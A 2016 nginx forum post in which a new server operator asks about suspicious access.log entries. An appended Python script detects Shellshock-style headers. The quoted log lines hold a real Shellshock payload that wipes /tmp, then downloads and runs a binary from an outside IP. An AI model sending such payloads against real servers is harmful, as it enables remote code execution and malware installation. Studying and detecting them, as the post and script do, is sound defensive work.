Suspicious log records
janro
nginx-forum at forum.nginx.org
Sat Oct 22 10:19:54 UTC 2016
Hi everyone.
I'm a newbie with Nginx and with servers, and I thought I'd ask your opinion
about the log input I noticed from last night.
There's clearly some sort of malicious attempt in access.log, which is
repeated four times. In error.log there are only 'closed keepalive connection'
records, which match those four attempts.
Everything runs fine on the server side. I'd just like to know: is this just a
normal day in the world of server logs, or something critical that needs
action?
Access.log
61.147.247.161 - - [22/Oct/2016:00:10:14 +0300] "GET / HTTP/1.1" 301 184 "()
{ :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1
-O /tmp/China.Z-axgfh >> /tmp/Run.sh;echo echo By China.Z >>
/tmp/Run.sh;echo chmod 777 /tmp/China.Z-axgfh >> /tmp/Run.sh;echo
/tmp/China.Z-axgfh >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
/tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c
\x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O
/tmp/China.Z-axgfh >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo
chmod 777 /tmp/China.Z-axgfh >> /tmp/Run.sh;echo /tmp/China.Z-axgfh >>
/tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777
/tmp/Run.sh;/tmp/Run.sh\x22" "-"
61.147.247.161 - - [22/Oct/2016:00:11:08 +0300] "GET / HTTP/1.1" 301 184 "()
{ :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1
-O /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo echo By China.Z >>
/tmp/Run.sh;echo chmod 777 /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo
/tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
/tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c
\x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O
/tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo echo By China.Z >>
/tmp/Run.sh;echo chmod 777 /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo
/tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
/tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "-"
61.147.247.161 - - [22/Oct/2016:00:12:28 +0300] "GET / HTTP/1.1" 301 184 "()
{ :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1
-O /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo echo By China.Z >>
/tmp/Run.sh;echo chmod 777 /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo
/tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
/tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c
\x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O
/tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo echo By China.Z >>
/tmp/Run.sh;echo chmod 777 /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo
/tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
/tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "-"
61.147.247.161 - - [22/Oct/2016:00:13:29 +0300] "GET / HTTP/1.1" 301 184 "()
{ :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1
-O /tmp/China.Z-xxmb >> /tmp/Run.sh;echo echo By China.Z >>
/tmp/Run.sh;echo chmod 777 /tmp/China.Z-xxmb >> /tmp/Run.sh;echo
/tmp/China.Z-xxmb >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
/tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c
\x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O /tmp/China.Z-xxmb
>> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777
/tmp/China.Z-xxmb >> /tmp/Run.sh;echo /tmp/China.Z-xxmb >>
/tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777
/tmp/Run.sh;/tmp/Run.sh\x22" "-"
Error.log
2016/10/22 00:10:15 [info] 1751#0: *27218 client 61.147.247.161 closed
keepalive connection
2016/10/22 00:11:09 [info] 1751#0: *27219 client 61.147.247.161 closed
keepalive connection
2016/10/22 00:12:29 [info] 1751#0: *27220 client 61.147.247.161 closed
keepalive connection
2016/10/22 00:13:29 [info] 1751#0: *27221 client 61.147.247.161 closed
keepalive connection
Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270472,270472#msg-270472
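
The access.log entries in the post carry a bash function definition (`() { ...`, the Shellshock probe pattern) in the Referer and User-Agent fields. As an added example, not part of the original post, the script below flags such lines in an nginx combined-format log and counts them per client and response status. The function names and the sample lines are constructed for illustration, and the sample payload is an inert placeholder.

```python
import re
from collections import Counter

# nginx "combined" layout; any extra quoted fields after the User-Agent
# (the log in the post has one) are ignored.
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)
# A bash function definition at the start of a header value: "() {" with
# optional whitespace, as seen in the Referer and User-Agent fields above.
FUNC_PREFIX_RE = re.compile(r'^\s*\(\s*\)\s*\{')

def scan(lines):
    """Return one finding per log line whose Referer or User-Agent starts with '() {'."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the expected format; skipped rather than guessed at
        hit = [f for f in ("referer", "agent") if FUNC_PREFIX_RE.match(m[f])]
        if hit:
            findings.append({"line": lineno, "ip": m["ip"], "time": m["time"],
                             "status": int(m["status"]), "fields": hit})
    return findings

def summarize(findings):
    """Count probes per (client IP, response status)."""
    return Counter((f["ip"], f["status"]) for f in findings)

# Constructed sample lines (documentation IP ranges, inert placeholder payload).
SAMPLE = [
    r'192.0.2.10 - - [22/Oct/2016:00:10:14 +0300] "GET / HTTP/1.1" 301 184 '
    r'"() { :; }; /bin/bash -c \x22echo constructed-sample\x22" '
    r'"() { :; }; /bin/bash -c \x22echo constructed-sample\x22" "-"',
    r'198.51.100.7 - - [22/Oct/2016:00:10:20 +0300] "GET /index.html HTTP/1.1" 200 612 '
    r'"-" "Mozilla/5.0 (X11; Linux x86_64)" "-"',
    r'192.0.2.10 - - [22/Oct/2016:00:11:08 +0300] "GET /cgi-bin/status HTTP/1.1" 404 162 '
    r'"-" "() { :; }; /bin/bash -c \x22echo constructed-sample\x22" "-"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f)
    print(summarize(scan(SAMPLE)))
```

A match shows only that a probe arrived and how the server answered it (301 in the post's entries). The header value matters only where it is handed to a vulnerable bash through the environment, for example by a CGI script, so the follow-up check is whether any such handler exists on the host.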